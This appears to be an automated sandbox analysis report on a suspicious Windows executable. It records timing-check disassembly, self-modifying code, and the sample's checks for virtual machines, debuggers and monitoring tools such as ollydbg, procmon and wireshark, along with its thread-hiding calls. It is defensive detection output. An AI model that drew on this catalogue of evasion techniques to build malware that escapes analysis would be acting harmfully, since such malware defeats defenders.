Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7051630 second address: 7051689 instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jne 00007F602F755AE5h 0x0000000e jmp 00007F5FC0E77A11h 0x00000013 or dword ptr [edx+38h], FFFFFFFFh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop ecx 0x0000001c pushfd 0x0000001d jmp 00007F5FC0E77A0Fh 0x00000022 xor esi, 356ADFBEh 0x00000028 jmp 00007F5FC0E77A19h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7051689 second address: 705172C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0CE52D7h 0x00000008 pop eax 0x00000009 jmp 00007F5FC0CE52D9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000015 jmp 00007F5FC0CE52CEh 0x0000001a or dword ptr [edx+40h], FFFFFFFFh 0x0000001e jmp 00007F5FC0CE52D0h 0x00000023 pop esi 0x00000024 jmp 00007F5FC0CE52D0h 0x00000029 pop ebx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F5FC0CE52CEh 0x00000031 jmp 00007F5FC0CE52D5h 0x00000036 popfd 0x00000037 movzx eax, di 0x0000003a popad 0x0000003b leave 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov di, ax 0x00000042 mov ah, 39h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70A0B19 second address: 70A0B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F5FC0E77A0Bh 0x0000000b or ecx, 05A81DBEh 0x00000011 jmp 00007F5FC0E77A19h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5FC0E77A18h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70A0B6A second address: 70A0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70A0B6E second address: 70A0B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70A0B74 second address: 70A0BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5FC0CE52CFh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5FC0CE52D5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70A0BA6 second address: 70A0BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0018 second address: 6FE001E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE001E second address: 6FE003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5FC0E77A10h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE003B second address: 6FE0041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0041 second address: 6FE0047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0047 second address: 6FE004B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0B5D second address: 6FE0B78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0B78 second address: 6FE0B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0B95 second address: 6FE0B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0B9B second address: 6FE0B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 6FE0B9F second address: 6FE0C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edi, 141DCE3Ah 0x00000012 call 00007F5FC0E77A0Bh 0x00000017 pushfd 0x00000018 jmp 00007F5FC0E77A18h 0x0000001d jmp 00007F5FC0E77A15h 0x00000022 popfd 0x00000023 pop esi 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F5FC0E77A17h 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5FC0E77A15h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010038 second address: 7010081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F5FC0CE52D6h 0x00000017 sbb ax, 3EB8h 0x0000001c jmp 00007F5FC0CE52CBh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010081 second address: 70100BB instructions: 0x00000000 rdtsc 0x00000002 call 00007F5FC0E77A18h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5FC0E77A11h 0x00000012 and esp, FFFFFFF0h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70100BB second address: 70100BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70100BF second address: 70100C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70100C5 second address: 7010116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 pushfd 0x00000013 jmp 00007F5FC0CE52D9h 0x00000018 xor ax, BEC6h 0x0000001d jmp 00007F5FC0CE52D1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010116 second address: 7010195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov di, AD4Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e movzx ecx, di 0x00000011 pushfd 0x00000012 jmp 00007F5FC0E77A0Dh 0x00000017 xor cx, D6D6h 0x0000001c jmp 00007F5FC0E77A11h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esp], ebx 0x00000026 jmp 00007F5FC0E77A0Eh 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d mov ax, CE0Dh 0x00000031 pushfd 0x00000032 jmp 00007F5FC0E77A0Ah 0x00000037 jmp 00007F5FC0E77A15h 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F5FC0E77A0Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010195 second address: 7010236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F5FC0CE52D6h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F5FC0CE52D0h 0x00000015 push eax 0x00000016 jmp 00007F5FC0CE52CBh 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d jmp 00007F5FC0CE52D4h 0x00000022 mov ah, 31h 0x00000024 popad 0x00000025 mov edi, dword ptr [ebp+08h] 0x00000028 jmp 00007F5FC0CE52CDh 0x0000002d mov dword ptr [esp+24h], 00000000h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov edx, 1D50D63Eh 0x0000003d pushfd 0x0000003e jmp 00007F5FC0CE52CFh 0x00000043 jmp 00007F5FC0CE52D3h 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010236 second address: 7010283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e jmp 00007F5FC0E77A0Eh 0x00000013 jc 00007F6030D29BD3h 0x00000019 jmp 00007F5FC0E77A10h 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010283 second address: 7010289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7010289 second address: 701028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 701028F second address: 70102B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0CE52D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70102B3 second address: 70102E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0E77A17h 0x00000008 pop esi 0x00000009 mov dx, 97CCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5FC0E77A0Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70102E7 second address: 70102FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 704090C second address: 7040979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F5FC0E77A17h 0x0000000f add ax, BA0Eh 0x00000014 jmp 00007F5FC0E77A19h 0x00000019 popfd 0x0000001a jmp 00007F5FC0E77A10h 0x0000001f popad 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5FC0E77A17h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040979 second address: 704097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70308DC second address: 7030903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0E77A15h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7030903 second address: 70309AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5FC0CE52D1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 jmp 00007F5FC0CE52CCh 0x00000016 mov ecx, 20D56BC1h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F5FC0CE52D8h 0x00000025 pop esi 0x00000026 push edx 0x00000027 pop ecx 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007F5FC0CE52D7h 0x0000002f xor si, B74Eh 0x00000034 jmp 00007F5FC0CE52D9h 0x00000039 popfd 0x0000003a popad 0x0000003b pop ebp 0x0000003c pushad 0x0000003d call 00007F5FC0CE52CCh 0x00000042 pushad 0x00000043 popad 0x00000044 pop eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040BD3 second address: 7040C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0E77A17h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F5FC0E77A19h 0x0000000f sbb ch, 00000006h 0x00000012 jmp 00007F5FC0E77A11h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5FC0E77A0Eh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F5FC0E77A0Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040C40 second address: 7040C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040C52 second address: 7040CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F5FC0E77A14h 0x00000012 pushfd 0x00000013 jmp 00007F5FC0E77A12h 0x00000018 jmp 00007F5FC0E77A15h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CAB second address: 7040CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CAF second address: 7040CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CB3 second address: 7040CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CB9 second address: 7040CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CBF second address: 7040CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, 4F28h 0x00000012 mov ecx, edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CD4 second address: 7040CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CDA second address: 7040CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CDE second address: 7040CF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 9470h 0x00000012 mov bx, 879Ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040CF5 second address: 7040D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7040D0A second address: 7040D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B05F0 second address: 70B0652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5FC0CE52D0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edx, 350A5164h 0x00000016 mov bx, 1FD0h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5FC0CE52CFh 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 push ecx 0x00000025 movsx edx, ax 0x00000028 pop eax 0x00000029 jmp 00007F5FC0CE52CDh 0x0000002e popad 0x0000002f mov dl, byte ptr [ebp+14h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B0652 second address: 70B0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B0656 second address: 70B065C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B065C second address: 70B0661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70B0661 second address: 70B06D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5FC0CE52CEh 0x0000000a jmp 00007F5FC0CE52D5h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5FC0CE52D3h 0x0000001f sub al, FFFFFF9Eh 0x00000022 jmp 00007F5FC0CE52D9h 0x00000027 popfd 0x00000028 call 00007F5FC0CE52D0h 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSpecial instruction interceptor: First address: C5512B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSpecial instruction interceptor: First address: C82EBC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSpecial instruction interceptor: First address: C69591 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSpecial instruction interceptor: First address: CE3A2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exe TID: 5996Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003D255D
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003D29FF
Source: C:\Users\user\Desktop\A3nofpjN9A.exeCode function: 0_2_003D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003D255D
Source: A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: A3nofpjN9A.exe, 00000000.00000003.2169724733.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169437946.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204540533.0000000001800000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169602744.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170003230.00000000017FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBAQE
Source: A3nofpjN9A.exeBinary or memory string: Hyper-V RAW
Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: A3nofpjN9A.exe, 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\A3nofpjN9A.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\A3nofpjN9A.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\A3nofpjN9A.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile opened: NTICE
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile opened: SICE
Source: C:\Users\user\Desktop\A3nofpjN9A.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\A3nofpjN9A.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeProcess queried: DebugPortJump to behavior
Source: A3nofpjN9A.exe, 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'Program Manager
Source: A3nofpjN9A.exeBinary or memory string: 6}'Program Manager
Source: C:\Users\user\Desktop\A3nofpjN9A.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\A3nofpjN9A.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
